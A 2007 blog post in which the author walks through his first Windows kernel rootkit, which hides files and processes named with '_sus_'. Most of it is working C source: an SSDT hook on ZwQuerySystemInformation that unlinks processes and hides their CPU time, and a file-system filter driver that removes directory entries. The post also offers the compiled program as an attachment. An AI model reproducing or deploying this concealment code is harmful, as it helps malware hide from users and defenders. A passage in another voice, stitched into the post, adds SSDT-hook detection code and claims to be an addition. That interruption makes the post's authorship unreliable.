

The first rootkit I wrote -- hiding files and processes [ 2007-10-02 16:41:07 | Author: dklkt ]

I wrote this before the National Day holiday; I have been busy the last couple of days, so I am only posting it now.

Here is the program's usage text:

=================================================================
This is SUS's rootkit. It can hide files and processes
   when their names include "_sus_".
=================================================================
Written by dklkt.  2007.9
Notice that it can't run automaticly after the computer reboot!

Usage: sushide2003 [-start]             Install and start the SUS's rootkit.
       sushide2003  -uninstall          Uninstall the rootkit.
-----------------------------------------------------------------

Running it directly, or with the -start argument, installs and starts the rootkit; the -uninstall argument stops and removes the rootkit.

The program hides every file whose name contains _sus_, and also hides such processes from the process list.

Here is how each function is implemented:

1. Hiding processes.

Process hiding uses an SSDT hook. The SSDT is the System Service Dispatch Table; it is indexed by system call number to locate a service function's address in memory. In Windows there is a function called ZwQuerySystemInformation, which Taskmgr.exe calls to obtain the list of processes on the system. By placing our own NtQuerySystemInformation in the SSDT and filtering the results the original function returns, we hide the process.
This is the replacement ZwQuerySystemInformation function:

NTSTATUS NewZwQuerySystemInformation(
            IN ULONG SystemInformationClass,
            IN PVOID SystemInformation,
            IN ULONG SystemInformationLength,
            OUT PULONG ReturnLength)
{
   NTSTATUS ntStatus;

   // Call the original service first, then filter what it returned.
   ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (
          SystemInformationClass,
          SystemInformation,
          SystemInformationLength,
          ReturnLength );

   if( NT_SUCCESS(ntStatus))
   {
      // Class 5 is SystemProcessInformation: a query for the process list.
      if(SystemInformationClass == 5)
      {
         struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
         struct _SYSTEM_PROCESSES *prev = NULL;

         while(curr)
         {
            //DbgPrint("Current item is %x\n", curr);
            if (curr->ProcessName.Buffer != NULL)
            {
               if( wcsstr( ( wchar_t *)(curr->ProcessName.Buffer), L"_sus_") )   // hide if the process name contains _sus_
               {
                  m_UserTime.QuadPart += curr->UserTime.QuadPart;
                  m_KernelTime.QuadPart += curr->KernelTime.QuadPart;

                  if(prev) // Middle or Last entry
                  {
                     if(curr->NextEntryDelta)
                        prev->NextEntryDelta += curr->NextEntryDelta;
                     else  // we are last, so make prev the end
                        prev->NextEntryDelta = 0;
                  }
                  else
                  {
                     if(curr->NextEntryDelta)
                     {
                        // we are first in the list, so move it forward
                        (char *)SystemInformation += curr->NextEntryDelta;
                     }
                     else // we are the only process!
                        SystemInformation = NULL;
                  }
               }
            }
            else // This is the entry for the Idle process
            {
               // Add the kernel and user times of the hidden (_sus_)
               // processes to the Idle process.
               curr->UserTime.QuadPart += m_UserTime.QuadPart;
               curr->KernelTime.QuadPart += m_KernelTime.QuadPart;

               // Reset the timers for next time we filter
               m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
            }
            prev = curr;
            if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta);
            else curr = NULL;
         }
      }
      else if (SystemInformationClass == 8) // Query for SystemProcessorTimes
      {
         struct _SYSTEM_PROCESSOR_TIMES * times = (struct _SYSTEM_PROCESSOR_TIMES *)SystemInformation;
         times->IdleTime.QuadPart += m_UserTime.QuadPart + m_KernelTime.QuadPart;
      }
   }
   return ntStatus;
}

2. Hiding files

File hiding could also have been done with a hook, but since I had the MS IFS DDK at hand I wrote it as a file-system filter driver instead. The filter sits directly above the file-system driver and modifies the results it receives before returning them to the driver above. Because a file-system filter driver is fairly complex, I only made simple changes to the sfilter sample that ships with the DDK.
First, create a routine, FsDirectoryControl, that handles IRP_MJ_DIRECTORY_CONTROL:

//=================================================
NTSTATUS
FsDirectoryControl(IN PDEVICE_OBJECT DeviceObject,
                   IN PIRP Irp)
{
    NTSTATUS status;
    PIO_STACK_LOCATION irpSp = IoGetCurrentIrpStackLocation(Irp);    // parameters of the current IRP stack location (IO_STACK_LOCATION)
//    PDEVICE_EXTENSION devExt = DeviceObject->DeviceExtension;
    PSFILTER_DEVICE_EXTENSION  devExt = DeviceObject->DeviceExtension;
    PFILE_BOTH_DIR_INFORMATION dirInfo = NULL;
    KEVENT waitEvent;
    //UNICODE_STRING path;

    ASSERT(IS_MY_DEVICE_OBJECT(DeviceObject));

    // Only user-mode directory enumerations at PASSIVE_LEVEL that ask for
    // FILE_BOTH_DIR_INFORMATION are filtered; everything else is passed through.
    if (IRP_MN_QUERY_DIRECTORY != irpSp->MinorFunction)
    {
        goto SkipHandle;
    }
    if (Irp->RequestorMode == KernelMode)
    {
        goto SkipHandle;
    }
    if (KeGetCurrentIrql() != PASSIVE_LEVEL )
    {
        goto SkipHandle;
    }
    /*
    if (FileBothDirectoryInformation != ((PQUERY_DIRECTORY)&irpSp->Parameters)->FileInformationClass)
    {
        goto SkipHandle;
    }*/
    if (irpSp ->Parameters.QueryDirectory.FileInformationClass != FileBothDirectoryInformation)
    {
        goto SkipHandle;
    }
    // set the completion routine
    KeInitializeEvent(&waitEvent, NotificationEvent, FALSE);
    IoCopyCurrentIrpStackLocationToNext(Irp);
    //IoSetCompletionRoutine(Irp,CompletionRoutine,context,InvokeOnSuccess,InvokeOnError,InvokeOnCancel);
    IoSetCompletionRoutine(
                           Irp,
                           DirControlCompletion,        //CompletionRoutine
                           &waitEvent,                  //context parameter
                           TRUE,
                           TRUE,
                           TRUE
                           );

    status = IoCallDriver(devExt->AttachedToDeviceObject, Irp);
    if (STATUS_PENDING == status)
    {
        // wait for completion
        status = KeWaitForSingleObject(&waitEvent,
                                       Executive,
                                       KernelMode,
                                       FALSE,
                                       NULL
                                       );
        ASSERT(STATUS_SUCCESS == status);
    }
    if (!NT_SUCCESS(status) ||(0 == irpSp->Parameters.QueryFile.Length))
    {
        IoCompleteRequest(Irp, IO_NO_INCREMENT);
        return status;
    }
    //KdPrint(("Hook Directory.\n"));
    //HandleDirectory(Irp->UserBuffer,  &((PQUERY_DIRECTORY)&irpSp->Parameters)->Length);
    HandleDirectory(Irp->UserBuffer,  &(Irp->IoStatus.Information));

    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return status;

SkipHandle:
    IoSkipCurrentIrpStackLocation(Irp);
    return IoCallDriver(devExt->AttachedToDeviceObject, Irp);
}

Then operate on the returned results:
//-------------------------------------------
// filter function that hides files
BOOLEAN
HandleDirectory(IN OUT PFILE_BOTH_DIR_INFORMATION DirInfo, IN PULONG lpBufLenth)
{
  // walk the chain of directory entries (linked by NextEntryOffset)
  PFILE_BOTH_DIR_INFORMATION currentDirInfo = DirInfo;
  PFILE_BOTH_DIR_INFORMATION lastDirInfo = NULL;
  ULONG offset = 0;
  ULONG position = 0;
  ULONG newLenth = *lpBufLenth;
//  WCHAR fileName[] = L"Test.txt";
  do
  {
    offset = currentDirInfo->NextEntryOffset;
    if( wcsstr( ( wchar_t *)currentDirInfo->FileName, L"_sus_") )    // hide if the file name contains _sus_
    {
      //Now We Will Test The FileName
      //KdPrint(("%08x Hided File:%ws[%d]\n", currentDirInfo->FileAttributes, currentDirInfo->FileName, currentDirInfo->FileNameLength));
      if (0 == offset)
      {
        //KdPrint(("l[%d][%d][%d][%d]\n", newLenth, *lpBufLenth, position, newLenth-(*lpBufLenth - position)));
        //Reset Last DirInfo NextEntryOffset To Zero!!!
        if (lastDirInfo)
        {
          lastDirInfo->NextEntryOffset = 0;
          newLenth -= *lpBufLenth - position;
        }
        else
        {
          currentDirInfo->NextEntryOffset = 0;
          *lpBufLenth = 0;
          return TRUE;
        }
      }
      else
      {
        //KdPrint(("n[%d][%d][%d]\n", newLenth, *lpBufLenth, position));
        RtlMoveMemory(currentDirInfo, (PUCHAR)currentDirInfo + offset, *lpBufLenth - position - offset);
        newLenth -= offset;
        position += offset;
      }
    }
    else
    {
      //KdPrint(("%08x Directory:%ws\n", currentDirInfo->FileAttributes, currentDirInfo->FileName));
      //Move Next
      position += offset;
      lastDirInfo = currentDirInfo;
      currentDirInfo = (PFILE_BOTH_DIR_INFORMATION)((PUCHAR)currentDirInfo + offset);
    }
  } while (0 != offset);
  *lpBufLenth = newLenth;
  return TRUE;
}
//-------------------------------
// completion routine
NTSTATUS
DirControlCompletion(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp, IN PVOID Context)
{
  PKEVENT event = Context;

    UNREFERENCED_PARAMETER( DeviceObject );
    UNREFERENCED_PARAMETER( Irp );

    ASSERT(IS_MY_DEVICE_OBJECT( DeviceObject ));

  //if (Irp->PendingReturned) IoMarkIrpPending(Irp);
    KeSetEvent(event, IO_NO_INCREMENT, FALSE);

    return STATUS_MORE_PROCESSING_REQUIRED;
}

Since I am still a beginner at rootkits, the code above is not my own work, which I want to state clearly; my thanks to its author. I am still learning many parts of it myself. I am currently reading 《ROOTKITS--Windows內核的安全防護》 (the Chinese edition of Rootkits: Subverting the Windows Kernel) by Greg Hoglund and James Butler, which I recommend. Incidentally, every method used in this program can be detected by IceSword.
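The detection the author alludes to is worth seeing in code. An SSDT hook like the one above replaces a table entry with the address of a function inside the rootkit's own driver, so an anti-rootkit tool can find it by checking that every service table entry points into a trusted kernel image (ntoskrnl for the main table). The following is an added example, not code from the post or from IceSword; the table layout, the image ranges and the hooked index 3 are all constructed for the demonstration and do not match any real Windows build.

```c
#include <stddef.h>
#include <stdint.h>

/* Minimal model of the kernel's service descriptor table: like the real
 * KeServiceDescriptorTable it starts with an array of handler addresses
 * indexed by system-service number. Constructed for this example. */
struct service_table {
    const uintptr_t *base;   /* ServiceTableBase: one handler address per index */
    size_t count;            /* NumberOfServices */
};

/* Load range of a kernel image that legitimately owns service handlers. */
struct image_range {
    const char *name;
    uintptr_t start;
    size_t size;
};

struct hook_finding {
    size_t index;            /* service index whose handler was redirected */
    uintptr_t target;        /* where the entry points now */
};

static int in_image(uintptr_t addr, const struct image_range *img)
{
    return addr >= img->start && addr < img->start + img->size;
}

/* SSDT integrity scan: every entry must point into a trusted image
 * (ntoskrnl, or win32k for the shadow table). An entry pointing anywhere
 * else is exactly what the hook on this page produces: the index of
 * ZwQuerySystemInformation now resolves into the rootkit's own driver.
 * Returns how many findings were written to out (capped at max_out). */
size_t find_ssdt_hooks(const struct service_table *t,
                       const struct image_range *trusted, size_t n_trusted,
                       struct hook_finding *out, size_t max_out)
{
    size_t found = 0;
    for (size_t i = 0; i < t->count; i++) {
        int ok = 0;
        for (size_t j = 0; j < n_trusted && !ok; j++)
            ok = in_image(t->base[i], &trusted[j]);
        if (!ok && found < max_out) {
            out[found].index = i;
            out[found].target = t->base[i];
            found++;
        }
    }
    return found;
}

/* Constructed scenario (made-up addresses, not any real build): an 8-entry
 * table whose entry 3 stands in for the ZwQuerySystemInformation index and
 * has been redirected into a driver mapped outside ntoskrnl. */
#define NTOS_BASE    0x80400000u
#define NTOS_SIZE    0x00200000u
#define ROOTKIT_BASE 0xf8a00000u

size_t demo_scan(struct hook_finding *out, size_t max_out)
{
    static const uintptr_t table[8] = {
        NTOS_BASE + 0x1000, NTOS_BASE + 0x2000, NTOS_BASE + 0x3000,
        ROOTKIT_BASE + 0x560,                       /* hooked entry */
        NTOS_BASE + 0x5000, NTOS_BASE + 0x6000, NTOS_BASE + 0x7000,
        NTOS_BASE + 0x8000 };
    const struct service_table t = { table, 8 };
    const struct image_range trusted[] = { { "ntoskrnl.exe", NTOS_BASE, NTOS_SIZE } };
    return find_ssdt_hooks(&t, trusted, 1, out, max_out);
}
```

On a real system the image ranges come from the loaded-module list and the table from the exported KeServiceDescriptorTable; a finding only says the entry was redirected, so the owning module of the target address still has to be identified before calling it malicious.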

The attachment is the compiled program. It was built on Win2003 and also works on XP.
To discourage malicious use, the program is packed with the 北斗 3.7 packer.

[Last modified by dklkt on 2008-04-27 20:37:40]
Tags: original programs

Source: 單克隆抗體's blog
Original URL: http://www.dklkt.cn/article.asp?id=39
